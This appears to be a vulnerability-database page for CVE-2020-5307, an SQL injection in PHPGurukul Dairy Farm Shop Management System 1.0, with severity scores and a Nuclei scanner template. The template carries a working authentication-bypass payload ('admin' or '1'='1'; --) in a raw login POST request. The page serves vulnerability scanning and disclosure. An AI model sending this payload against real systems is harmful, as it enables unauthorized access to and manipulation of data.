Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2020-5307
HistoryJul 25, 2021 - 2:50 a.m.

PHPGurukul Dairy Farm Shop Management System 1.0 - SQL Injection

2021-07-2502:50:53
ProjectDiscovery
github.com
2

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.7 High

AI Score

Confidence

High

0.022 Low

EPSS

Percentile

89.5%

PHPGurukul Dairy Farm Shop Management System 1.0 is vulnerable to SQL injection, as demonstrated by the username parameter in index.php, the category and CategoryCode parameters in add-category.php, the CompanyName parameter in add-company.php, and the ProductName and ProductPrice parameters in add-product.php.

id: CVE-2020-5307

info:
  name: PHPGurukul Dairy Farm Shop Management System 1.0 - SQL Injection
  author: gy741
  severity: critical
  description: PHPGurukul Dairy Farm Shop Management System 1.0 is vulnerable to SQL injection, as demonstrated by the username parameter in index.php, the category and CategoryCode parameters in add-category.php, the CompanyName parameter in add-company.php, and the ProductName and ProductPrice parameters in add-product.php.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
  remediation: |
    Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the PHPGurukul Dairy Farm Shop Management System 1.0.
  reference:
    - https://cinzinga.com/CVE-2020-5307-5308/
    - https://nvd.nist.gov/vuln/detail/CVE-2020-5307
    - https://www.exploit-db.com/exploits/47846
    - https://cinzinga.github.io/CVE-2020-5307-5308/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-5307
    cwe-id: CWE-89
    epss-score: 0.01863
    epss-percentile: 0.87061
    cpe: cpe:2.3:a:phpgurukul:dairy_farm_shop_management_system:1.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: phpgurukul
    product: dairy_farm_shop_management_system
  tags: cve,cve2020,sqli,edb,phpgurukul

http:
  - raw:
      - |
        POST /dfsms/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username=admin%27+or+%271%27+%3D+%271%27%3B+--+-&password=A&login=

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "add-category.php"

      - type: status
        status:
          - 302
# digest: 490a0046304402206abbdc420c025030b3ebf5d8939913814cdc09df85341ba215d904100e17fd24022033075b2aa72417041b94db8cafc9fed1f0c3129b5f4a913e928f3fbc6e8add40:922c64590222798bb761d5b6d8e72950

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.7 High

AI Score

Confidence

High

0.022 Low

EPSS

Percentile

89.5%

Related for NUCLEI:CVE-2020-5307